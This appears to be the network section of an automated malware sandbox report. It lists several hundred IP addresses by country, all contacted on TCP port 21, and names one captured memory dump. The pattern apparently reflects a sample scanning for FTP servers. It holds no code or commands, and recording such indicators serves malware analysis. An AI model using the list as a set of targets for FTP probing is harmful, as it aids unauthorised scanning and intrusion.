HK 218.253.32.5:21 tcp
SG 43.18.249.5:21 tcp
CN 101.231.123.5:21 tcp
US 71.233.180.5:21 tcp
CN 183.136.251.5:21 tcp
US 214.76.22.5:21 tcp
US 107.181.114.5:21 tcp
ID 114.125.242.5:21 tcp
RU 5.140.32.5:21 tcp
KR 175.246.114.5:21 tcp
GB 25.200.73.5:21 tcp
US 47.208.34.5:21 tcp
US 136.189.163.5:21 tcp
PL 77.115.91.5:21 tcp
N/A 100.76.130.5:21 tcp
KR 110.10.196.5:21 tcp
BR 169.57.210.5:21 tcp
AU 157.155.43.5:21 tcp
FR 91.200.133.5:21 tcp
JP 221.74.70.5:21 tcp
US 21.210.156.5:21 tcp
CN 117.26.63.5:21 tcp
HK 119.236.202.5:21 tcp
US 55.13.183.5:21 tcp
DE 93.237.71.5:21 tcp
US 155.124.172.5:21 tcp
NC 113.21.104.5:21 tcp
US 99.164.46.5:21 tcp
US 9.217.3.5:21 tcp
BG 92.247.56.5:21 tcp
US 207.78.60.5:21 tcp
US 44.121.179.5:21 tcp
AU 49.176.24.5:21 tcp
JP 219.8.174.5:21 tcp
US 128.150.121.5:21 tcp
US 136.179.21.6:21 tcp
FR 94.238.73.6:21 tcp
SA 142.247.182.6:21 tcp
KR 106.246.66.6:21 tcp
SD 102.143.166.6:21 tcp
US 45.40.156.6:21 tcp
US 13.96.97.6:21 tcp
US 144.153.176.6:21 tcp
HK 91.238.114.6:21 tcp
JP 165.241.212.6:21 tcp
US 199.47.78.6:21 tcp
US 100.202.163.6:21 tcp
GB 25.221.159.6:21 tcp
US 214.179.192.6:21 tcp
CN 171.215.251.6:21 tcp
US 151.102.255.6:21 tcp
GB 92.6.93.6:21 tcp
SE 217.215.228.6:21 tcp
PK 39.37.163.6:21 tcp
BR 32.109.16.6:21 tcp
US 65.119.12.6:21 tcp
AT 185.224.202.6:21 tcp
US 38.146.227.6:21 tcp
DE 62.245.149.6:21 tcp
JP 90.149.174.6:21 tcp
US 214.204.216.6:21 tcp
BR 189.110.110.6:21 tcp
TW 1.172.163.6:21 tcp
US 214.198.169.6:21 tcp
CA 209.153.254.6:21 tcp
CN 222.34.143.6:21 tcp
JP 219.215.179.6:21 tcp
US 22.241.110.6:21 tcp
CA 149.25.145.6:21 tcp
NL 77.60.153.6:21 tcp
US 50.211.123.6:21 tcp
US 146.189.169.6:21 tcp
US 17.27.218.6:21 tcp
US 69.86.9.6:21 tcp
US 128.182.189.6:21 tcp
IT 79.18.123.6:21 tcp
US 48.146.198.6:21 tcp
MG 197.215.195.6:21 tcp
NO 148.123.247.6:21 tcp
AU 146.221.176.6:21 tcp
US 205.4.195.6:21 tcp
US 21.44.179.6:21 tcp
IT 31.27.172.6:21 tcp
US 16.64.31.6:21 tcp
DE 77.176.17.6:21 tcp
GB 81.143.195.6:21 tcp
KR 58.122.19.6:21 tcp
KR 210.97.212.6:21 tcp
US 153.48.119.6:21 tcp
DE 141.27.179.6:21 tcp
CH 188.60.1.6:21 tcp
US 22.129.251.6:21 tcp
BE 84.195.189.6:21 tcp
CN 114.80.133.6:21 tcp
CN 183.185.218.6:21 tcp
BR 179.115.78.6:21 tcp
FR 109.18.53.6:21 tcp
CA 74.12.159.6:21 tcp
CN 121.8.130.6:21 tcp
FR 81.1.57.6:21 tcp
CH 57.32.238.6:21 tcp
JP 133.238.93.6:21 tcp
US 18.123.182.6:21 tcp
US 64.192.37.6:21 tcp
KR 49.254.251.6:21 tcp
IT 88.44.58.6:21 tcp
US 26.80.65.6:21 tcp
US 24.210.165.6:21 tcp
SE 13.63.65.6:21 tcp
US 22.76.125.6:21 tcp
GB 82.37.252.6:21 tcp
US 26.211.185.6:21 tcp
JP 221.189.183.6:21 tcp
US 131.6.40.6:21 tcp
US 26.109.78.6:21 tcp
US 11.148.161.6:21 tcp
ZA 197.70.251.6:21 tcp
TW 42.68.213.6:21 tcp
KR 211.221.198.6:21 tcp
GB 195.106.81.6:21 tcp
US 171.181.180.6:21 tcp
US 104.6.112.6:21 tcp
US 207.178.255.6:21 tcp
US 150.136.76.7:21 tcp
US 198.55.138.7:21 tcp
US 214.195.254.7:21 tcp
US 76.130.70.7:21 tcp
ID 180.251.18.7:21 tcp
FR 154.194.9.7:21 tcp
US 66.57.136.7:21 tcp
US 44.221.244.7:21 tcp
CN 183.24.117.7:21 tcp
JP 61.117.212.7:21 tcp
CN 210.37.205.7:21 tcp
KR 211.208.114.7:21 tcp
US 192.11.136.7:21 tcp
VN 27.70.50.7:21 tcp
CN 120.217.252.7:21 tcp
US 149.33.193.7:21 tcp
NL 194.194.229.7:21 tcp
US 168.162.46.7:21 tcp
US 173.254.221.7:21 tcp
IT 194.184.190.7:21 tcp
BR 191.194.99.7:21 tcp
US 131.60.143.7:21 tcp
ES 138.4.166.7:21 tcp
TW 113.21.176.7:21 tcp
TW 118.231.18.7:21 tcp
KR 121.174.9.7:21 tcp
US 4.198.244.7:21 tcp
US 40.225.189.7:21 tcp
US 97.1.192.7:21 tcp
N/A 127.24.153.7:21 tcp
SE 130.244.1.7:21 tcp
TN 197.1.189.7:21 tcp
CN 218.57.159.7:21 tcp
US 73.86.133.7:21 tcp
US 67.40.146.7:21 tcp
CH 138.191.219.7:21 tcp
US 63.8.68.7:21 tcp
AU 138.130.145.7:21 tcp
US 159.57.169.7:21 tcp
CH 212.117.202.7:21 tcp
JP 160.241.57.7:21 tcp
HK 54.46.128.7:21 tcp
NL 185.238.169.7:21 tcp
JP 124.109.202.7:21 tcp
TW 101.136.212.7:21 tcp
N/A 127.57.212.7:21 tcp
RO 92.80.45.7:21 tcp
AU 118.211.182.7:21 tcp
US 66.44.136.7:21 tcp
CN 223.8.192.7:21 tcp
BR 187.21.133.7:21 tcp
TR 88.231.3.7:21 tcp
CN 39.182.17.7:21 tcp
JP 220.6.110.7:21 tcp
US 35.129.42.7:21 tcp
US 57.172.208.7:21 tcp
SG 43.57.100.7:21 tcp
US 192.251.215.7:21 tcp
US 35.122.153.7:21 tcp
JP 222.14.143.7:21 tcp
US 30.145.163.7:21 tcp
US 174.200.182.7:21 tcp
BR 191.246.247.7:21 tcp
N/A 10.36.93.7:21 tcp
US 22.36.132.7:21 tcp
US 208.177.18.7:21 tcp
US 209.70.195.7:21 tcp
VN 14.254.200.7:21 tcp
ES 161.116.113.7:21 tcp
US 7.55.201.7:21 tcp
US 96.198.97.7:21 tcp
US 172.170.135.7:21 tcp
US 131.34.25.7:21 tcp
VN 103.14.155.7:21 tcp
US 13.144.206.7:21 tcp
FR 90.125.12.7:21 tcp
AU 203.63.71.7:21 tcp
US 161.31.17.7:21 tcp
JP 202.217.65.7:21 tcp
DE 145.55.101.7:21 tcp
ID 39.194.52.7:21 tcp
US 18.207.29.7:21 tcp
RU 5.129.249.7:21 tcp
CN 49.86.58.7:21 tcp
US 35.114.65.7:21 tcp
HK 23.234.5.8:21 tcp
US 205.38.109.8:21 tcp
TW 61.231.221.8:21 tcp
CA 99.215.151.8:21 tcp
IT 91.187.203.8:21 tcp
LA 183.182.120.8:21 tcp
CN 112.0.100.8:21 tcp
KR 211.194.255.8:21 tcp
NL 23.97.161.8:21 tcp
US 6.187.166.8:21 tcp
NL 83.82.137.8:21 tcp
JP 157.14.1.8:21 tcp
SG 43.55.107.8:21 tcp
NL 83.83.87.8:21 tcp
JP 220.96.179.8:21 tcp
DE 77.184.65.8:21 tcp
BR 187.11.94.8:21 tcp
JP 160.11.159.8:21 tcp
KR 219.254.254.8:21 tcp
US 74.178.68.8:21 tcp
CN 221.14.228.8:21 tcp
JP 221.112.123.8:21 tcp
US 40.47.198.8:21 tcp
US 11.158.176.8:21 tcp
US 138.138.255.8:21 tcp
KW 37.231.146.8:21 tcp
CN 218.6.210.8:21 tcp
CN 123.119.149.8:21 tcp
US 108.174.192.8:21 tcp
CN 119.96.19.8:21 tcp
JP 143.253.212.8:21 tcp
BR 200.206.43.8:21 tcp
US 67.189.136.8:21 tcp
RU 89.16.108.8:21 tcp
N/A 127.22.215.8:21 tcp
NL 145.24.169.8:21 tcp
US 16.13.190.8:21 tcp
DE 53.174.91.8:21 tcp
US 48.125.179.8:21 tcp
CA 50.64.10.8:21 tcp
US 135.59.141.8:21 tcp
US 170.149.212.8:21 tcp
US 149.11.218.8:21 tcp
GB 81.151.146.8:21 tcp
US 17.122.91.8:21 tcp
BR 177.107.85.8:21 tcp
US 161.21.100.8:21 tcp
CN 42.251.244.8:21 tcp
CN 110.96.110.8:21 tcp
AU 52.147.53.8:21 tcp
US 50.161.31.8:21 tcp
US 206.59.187.8:21 tcp
NL 188.205.61.8:21 tcp
KR 39.4.236.8:21 tcp
CN 222.215.247.8:21 tcp
US 37.18.180.8:21 tcp
US 72.63.146.8:21 tcp
US 70.132.140.8:21 tcp
US 168.102.81.8:21 tcp
US 76.168.212.8:21 tcp
IT 151.63.133.8:21 tcp
EG 217.52.58.8:21 tcp
US 52.145.100.8:21 tcp
MK 92.55.116.8:21 tcp
JP 133.115.221.8:21 tcp
HU 84.206.7.8:21 tcp
JP 125.12.44.8:21 tcp
SA 167.86.191.8:21 tcp
US 163.192.192.8:21 tcp
US 139.161.251.8:21 tcp
US 96.75.252.8:21 tcp
ES 95.122.172.8:21 tcp
US 207.27.221.8:21 tcp
AU 114.73.130.8:21 tcp
CN 113.200.171.8:21 tcp
DE 53.109.221.8:21 tcp
US 33.14.73.8:21 tcp
KR 222.100.46.8:21 tcp
NL 129.125.74.8:21 tcp
US 141.155.76.8:21 tcp
IT 85.46.89.8:21 tcp
CN 120.40.25.8:21 tcp
US 215.204.159.8:21 tcp
N/A 10.34.97.8:21 tcp
SG 43.78.193.8:21 tcp
US 22.208.185.8:21 tcp
IN 125.63.116.8:21 tcp
US 97.169.119.9:21 tcp
US 20.176.86.9:21 tcp
GB 46.208.44.9:21 tcp
DE 53.244.24.9:21 tcp
CH 147.86.73.9:21 tcp
US 32.210.50.9:21 tcp
US 166.59.124.9:21 tcp
IE 92.235.7.9:21 tcp
US 160.254.21.9:21 tcp
CN 39.174.87.9:21 tcp
SA 37.241.131.9:21 tcp
US 173.22.254.9:21 tcp
US 57.103.154.9:21 tcp
US 16.121.141.9:21 tcp
SG 8.162.153.9:21 tcp
US 40.50.21.9:21 tcp
PR 72.50.37.9:21 tcp
US 38.236.29.9:21 tcp
PE 186.161.61.9:21 tcp
US 18.55.89.9:21 tcp
AO 41.63.182.9:21 tcp
IR 172.80.185.9:21 tcp
DE 74.1.70.9:21 tcp
N/A 10.125.149.9:21 tcp
US 170.125.110.9:21 tcp
US 56.148.123.9:21 tcp
US 214.23.226.9:21 tcp
FR 82.238.221.9:21 tcp
FR 83.112.156.9:21 tcp
FR 138.231.31.9:21 tcp
CN 58.60.8.9:21 tcp
GB 195.137.53.9:21 tcp
QA 34.18.179.9:21 tcp
VN 14.164.123.9:21 tcp
NL 156.83.241.9:21 tcp
US 206.142.133.9:21 tcp
US 76.220.169.9:21 tcp
US 149.2.147.9:21 tcp
US 47.253.177.9:21 tcp
US 146.132.140.9:21 tcp
US 6.162.96.9:21 tcp
ZA 102.220.114.9:21 tcp
US 23.155.123.9:21 tcp
US 4.99.123.9:21 tcp
JP 61.44.163.9:21 tcp
GB 90.223.29.9:21 tcp
CN 27.195.135.9:21 tcp
US 52.249.245.9:21 tcp
KR 1.218.89.9:21 tcp
SG 54.151.185.9:21 tcp
US 134.40.228.9:21 tcp
TW 210.63.166.9:21 tcp
EG 105.47.24.9:21 tcp
US 206.210.18.9:21 tcp
IL 176.229.224.9:21 tcp
US 146.114.10.9:21 tcp
FI 213.141.124.9:21 tcp
CN 1.3.163.9:21 tcp
US 74.55.210.9:21 tcp
LV 87.99.74.9:21 tcp
US 147.106.5.9:21 tcp
PL 83.218.102.9:21 tcp
JP 210.236.195.9:21 tcp
US 104.197.27.9:21 tcp
DZ 154.240.53.9:21 tcp
GB 25.26.121.9:21 tcp
FR 89.86.3.9:21 tcp
EG 156.200.123.9:21 tcp
US 21.26.40.9:21 tcp
US 72.133.109.9:21 tcp
EG 196.153.166.9:21 tcp
ZA 164.151.225.9:21 tcp
US 136.10.159.9:21 tcp
US 146.123.166.9:21 tcp
US 100.180.206.9:21 tcp
US 65.161.80.9:21 tcp
GB 25.157.177.9:21 tcp
IE 185.67.22.9:21 tcp
JP 27.83.136.9:21 tcp
DE 91.249.112.9:21 tcp
US 96.6.58.9:21 tcp
US 21.131.58.9:21 tcp
CA 142.52.146.9:21 tcp
DE 84.119.99.9:21 tcp
CN 36.222.85.9:21 tcp
US 44.181.249.9:21 tcp
US 170.1.136.9:21 tcp
CN 61.55.82.10:21 tcp
PH 175.158.208.10:21 tcp
US 167.31.253.10:21 tcp
KR 223.174.144.10:21 tcp
US 28.96.146.10:21 tcp
US 137.145.179.10:21 tcp
CN 210.83.234.10:21 tcp
US 47.178.120.10:21 tcp
BR 189.125.156.10:21 tcp
PL 83.11.241.10:21 tcp
US 162.151.146.10:21 tcp
US 192.96.212.10:21 tcp
US 158.164.159.10:21 tcp
VE 186.89.185.10:21 tcp
US 35.119.182.10:21 tcp
US 64.142.182.10:21 tcp
CN 117.13.25.10:21 tcp
JP 126.122.159.10:21 tcp
EG 41.40.145.10:21 tcp
ES 195.55.193.10:21 tcp
US 161.241.176.10:21 tcp
DK 188.215.86.10:21 tcp
AR 181.27.44.10:21 tcp
UA 62.16.29.10:21 tcp
CN 58.194.110.10:21 tcp
US 184.125.112.10:21 tcp
AU 112.141.166.10:21 tcp
US 160.41.84.10:21 tcp
US 28.55.109.10:21 tcp
US 107.157.144.10:21 tcp
AU 203.143.195.10:21 tcp
DE 134.104.187.10:21 tcp
US 131.89.24.10:21 tcp
RU 178.20.182.10:21 tcp
US 26.134.102.10:21 tcp
US 152.60.234.10:21 tcp
US 75.142.182.10:21 tcp
US 12.158.254.10:21 tcp
VN 14.243.212.10:21 tcp
US 63.29.35.10:21 tcp
CN 113.125.35.10:21 tcp
JP 122.197.249.10:21 tcp
US 75.72.42.10:21 tcp
BE 109.132.157.10:21 tcp
JP 126.8.118.10:21 tcp
KR 124.138.232.10:21 tcp
KR 14.86.140.10:21 tcp
IT 213.213.120.10:21 tcp
US 192.6.114.10:21 tcp
PH 202.129.238.10:21 tcp
PK 116.0.61.10:21 tcp
CN 36.59.78.10:21 tcp
US 38.75.68.10:21 tcp
US 166.102.232.10:21 tcp
CN 14.135.123.10:21 tcp
FR 131.254.140.10:21 tcp
US 4.97.39.10:21 tcp
NL 94.168.136.10:21 tcp
LT 83.181.91.10:21 tcp
CH 81.62.32.10:21 tcp
HK 203.186.38.10:21 tcp
IT 159.213.159.10:21 tcp
BR 187.98.216.10:21 tcp
KR 106.240.120.10:21 tcp
US 215.198.109.10:21 tcp
CH 57.36.40.10:21 tcp
NL 62.207.149.10:21 tcp
FR 194.53.6.10:21 tcp
US 158.228.34.10:21 tcp
US 23.200.247.10:21 tcp
US 24.101.216.10:21 tcp
JP 219.1.44.10:21 tcp
US 3.52.208.10:21 tcp
US 28.98.147.10:21 tcp
US 33.27.169.10:21 tcp
US 172.159.93.10:21 tcp
US 33.80.78.10:21 tcp
SE 131.115.68.10:21 tcp
US 7.52.179.10:21 tcp
US 169.130.238.10:21 tcp
US 167.138.225.10:21 tcp
GB 157.140.1.10:21 tcp
ZA 196.13.220.10:21 tcp
US 3.246.162.10:21 tcp
BR 200.135.91.10:21 tcp
US 11.180.49.11:21 tcp
US 166.187.195.11:21 tcp
CL 186.67.24.11:21 tcp
DE 188.46.61.11:21 tcp
GB 25.115.222.11:21 tcp
AU 121.223.133.11:21 tcp
US 163.187.140.11:21 tcp
CN 36.207.107.11:21 tcp
US 156.138.34.11:21 tcp
US 67.104.97.11:21 tcp
EG 197.62.52.11:21 tcp
US 63.23.255.11:21 tcp
US 12.80.225.11:21 tcp
CN 61.55.32.11:21 tcp
US 48.178.179.11:21 tcp
LU 146.220.182.11:21 tcp
DE 53.223.117.11:21 tcp
GB 150.204.117.11:21 tcp
US 7.194.84.11:21 tcp
US 158.68.177.11:21 tcp
US 13.18.208.11:21 tcp
AU 13.210.120.11:21 tcp
DE 79.213.53.11:21 tcp
US 131.7.219.11:21 tcp
US 13.164.104.11:21 tcp
US 141.181.1.11:21 tcp
US 130.109.156.11:21 tcp
ZA 192.96.8.11:21 tcp
US 4.151.185.11:21 tcp
US 76.148.156.11:21 tcp
RU 37.145.218.11:21 tcp
IR 151.233.94.11:21 tcp
US 207.240.104.11:21 tcp
US 135.217.146.11:21 tcp
PL 83.13.149.11:21 tcp
US 216.60.24.11:21 tcp
EG 156.191.143.11:21 tcp
US 21.145.182.11:21 tcp
IT 5.171.218.11:21 tcp
CN 119.3.117.11:21 tcp
VN 171.236.146.11:21 tcp
RU 188.18.8.11:21 tcp
BR 177.171.195.11:21 tcp
DE 53.83.99.11:21 tcp
US 141.142.136.11:21 tcp
US 199.138.37.11:21 tcp
US 216.171.208.11:21 tcp
KE 196.99.228.11:21 tcp
US 71.138.208.11:21 tcp
CN 175.3.78.11:21 tcp
CN 218.80.14.11:21 tcp
US 107.187.192.11:21 tcp
US 99.193.141.11:21 tcp
CN 14.125.234.11:21 tcp
US 55.233.57.11:21 tcp
SE 52.121.193.11:21 tcp
US 3.50.143.11:21 tcp
SK 147.213.120.11:21 tcp
US 104.178.212.11:21 tcp
CN 39.102.98.11:21 tcp
US 70.159.7.11:21 tcp
US 21.35.127.11:21 tcp
RU 37.147.87.11:21 tcp
FI 62.240.89.11:21 tcp
US 11.193.172.11:21 tcp
US 198.82.29.11:21 tcp
CN 113.62.143.11:21 tcp
US 156.85.100.11:21 tcp
GB 92.23.45.11:21 tcp
DE 53.88.6.11:21 tcp
KZ 2.78.228.11:21 tcp
US 143.31.83.11:21 tcp
CN 113.83.202.11:21 tcp
BR 179.72.172.11:21 tcp
US 143.166.134.11:21 tcp
US 70.63.18.11:21 tcp
PL 83.21.155.11:21 tcp
US 13.0.38.11:21 tcp
CN 223.198.161.11:21 tcp
CN 220.200.145.11:21 tcp
US 98.117.136.11:21 tcp
TW 42.68.55.11:21 tcp
AT 91.112.217.11:21 tcp
US 206.62.30.11:21 tcp
DE 217.85.97.11:21 tcp
SE 62.68.67.11:21 tcp
BR 189.52.35.11:21 tcp
GB 178.96.231.12:21 tcp
US 8.123.138.12:21 tcp
CN 101.76.26.12:21 tcp
KR 106.240.6.12:21 tcp
RU 5.44.172.12:21 tcp
US 65.161.189.12:21 tcp
CA 138.119.47.12:21 tcp
KR 106.247.155.12:21 tcp
CN 59.44.70.12:21 tcp
CL 191.125.37.12:21 tcp
IN 144.16.208.12:21 tcp
US 44.109.176.12:21 tcp
KR 59.31.44.12:21 tcp
US 159.204.110.12:21 tcp
ID 103.31.37.12:21 tcp
US 54.129.5.12:21 tcp
JP 133.37.132.12:21 tcp
ID 120.161.159.12:21 tcp
CH 92.106.244.12:21 tcp
US 40.217.218.12:21 tcp
US 144.129.217.12:21 tcp
CN 175.88.215.12:21 tcp
CN 114.223.19.12:21 tcp
DE 46.90.82.12:21 tcp
N/A 36.200.212.12:21 tcp
N/A 219.49.133.12:21 tcp
N/A 120.197.114.12:21 tcp
N/A 71.159.220.12:21 tcp
N/A 1.178.202.12:21 tcp
N/A 118.151.11.12:21 tcp
N/A 174.46.106.12:21 tcp
N/A 211.179.125.12:21 tcp
N/A 35.6.170.12:21 tcp
N/A 67.65.16.12:21 tcp
N/A 41.114.35.12:21 tcp
N/A 36.3.16.12:21 tcp
N/A 119.148.202.12:21 tcp
N/A 42.20.254.12:21 tcp
N/A 209.78.14.12:21 tcp
N/A 103.249.94.12:21 tcp
N/A 132.253.58.12:21 tcp
N/A 40.20.123.12:21 tcp
N/A 103.230.254.12:21 tcp
N/A 216.227.176.12:21 tcp
N/A 186.63.169.12:21 tcp
N/A 156.230.140.12:21 tcp
N/A 79.101.202.12:21 tcp
N/A 30.88.157.12:21 tcp
N/A 114.213.166.12:21 tcp
N/A 57.6.110.12:21 tcp
N/A 118.40.210.12:21 tcp
N/A 122.38.87.12:21 tcp
N/A 132.150.226.12:21 tcp
N/A 167.187.16.12:21 tcp
N/A 24.191.185.12:21 tcp
N/A 35.33.133.12:21 tcp
N/A 215.20.84.12:21 tcp
N/A 120.145.78.12:21 tcp

Files

memory/4368-0-0x0000000000400000-0x0000000000421000-memory.dmp